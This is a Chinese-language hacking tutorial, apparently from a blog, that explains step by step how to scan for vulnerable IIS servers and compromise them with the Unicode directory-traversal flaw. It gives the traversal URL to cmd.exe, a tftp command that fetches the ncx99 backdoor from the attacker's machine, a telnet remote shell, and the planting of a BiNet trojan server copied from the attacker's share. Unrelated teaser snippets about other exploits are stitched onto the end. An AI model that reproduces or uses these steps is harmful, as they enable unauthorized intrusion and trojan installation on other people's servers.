馬木必備裝備:**獵手v3.1可是最新版,
unicode漏洞掃瞄器
好了,可以開始工作了。。。。。
1、用**獵手掃80埠,我為什麼不用supperscan呢?後面自由分曉。掃到後儲存一下列表,只要埠和型別即可。
2、開啟剛才的列表,去掉後面的「:80」只保留前面的ip位址就可以了,用word替換功能,別忘了儲存為txt檔案哦。知道為什麼不用supperscan了吧,它後面的東西太多了,沒辦法用替換功能,手動刪半天。
3、開啟unicode漏洞掃瞄器,加入剛才處理過的ip列表,開始掃吧,哇!!!好多漏洞啊,這就是中國的網路。用ie瀏覽一下掃到後的ip,找乙個主 頁是微軟example的肉雞,嘿嘿,風險小啊。我找了個61.***.***.***,不是我不想玩阿扁,我只有169的權利,又沒有好用socks5 **,哎。。。。。
4、執行你的tftp32,你的機器就變成了乙個小的ftp伺服器了。
5、開啟ie,輸入http://61.***.***.***/scr!pts/..%c1%9c.. /winnt/system32/cmd.exe?/c+tftp -i 10.***.***.*** get ncx99.exe c://inetpub//scr!pts//tel.exe注意其中的61.***.***.***就是你剛才掃到的位址,%c1%9c就是你剛才掃的 漏洞了,10.***.***.***就是你自己的ip了,上傳ncx99木馬,用來開啟肉雞的99埠,可以用telnet連線。
6、用http://61.***.***.***/scr!pts/..%c1%9c../winnt/system32/cmd.exe?/c+c:/inetpub/scr!pts/tel.exe遠端開啟這個ncx99木馬。
7、然後你就可以telnet 61.***.***.*** 99,哈哈~~~你是admin了,爽!!!然後開啟你的d盤的完全共享,並把配置好的bionet服務端放到根目錄裡,回到telnet,cd inetpub/scr!pts/
copy //10.***.***.***/d/server.exe
然後是漫長的等待。。。。。
copy server.exe winnt/system/
server.exe
用bioney連線,種木馬成功,^_^
注意:
1、之所以不用tftp上傳木馬是因為它的很容易掉線,傳300k的大檔案更是如此。
2、之所以要將server.exe copy到system裡執行是因為在scr!pts目錄裡許可權不夠,不能執行。
3、之所以要選bionet是因為它對winnt,win2000的支援比較好,當然你也可以上傳冰河。
4、當然你也可以用unicode漏洞掃瞄器的內建命令。
IIS的Unicode漏洞攻擊
iis有十多種常見漏洞,但利用得最多的莫過於unicode解析錯誤漏洞。微軟iis 4.0 5.0在unicode字元解碼的實現中存在乙個安全漏洞,使用者可以遠端通過iis執行任意命令。當iis開啟檔案時,如果該檔名包含unicode字元,它會對它進行解碼。如果使用者提供一些特殊的編碼,將導致iis...
pwn gets 漏洞的利用
其實做pwn題是有一段時間了 但是因為複習以及學習驅動 所以沒有什麼時間寫部落格 然後這一次寫乙個pwn的題 這個題 還是很簡單的 先用ida 看一下 發現了 我們這個題 有明顯的利用漏洞 gets 然後 我們發現了 有srand 是要確定隨機種子 那麼 如果 我們 把這個種子 給覆蓋掉 那麼我們就...
Dedecms getip 的漏洞利用
flyh4t在非安全發布了dedecms getip 的注射漏洞,漏洞本身的成因沒什麼好說的老掉牙的x forwarded for的問題,我想這個漏洞很多人都找到了,不過這個漏洞的利用有個地方還是可以說說的,可以直接得到shell 在使用者登陸後把使用者資訊寫如了快取 include inc mem...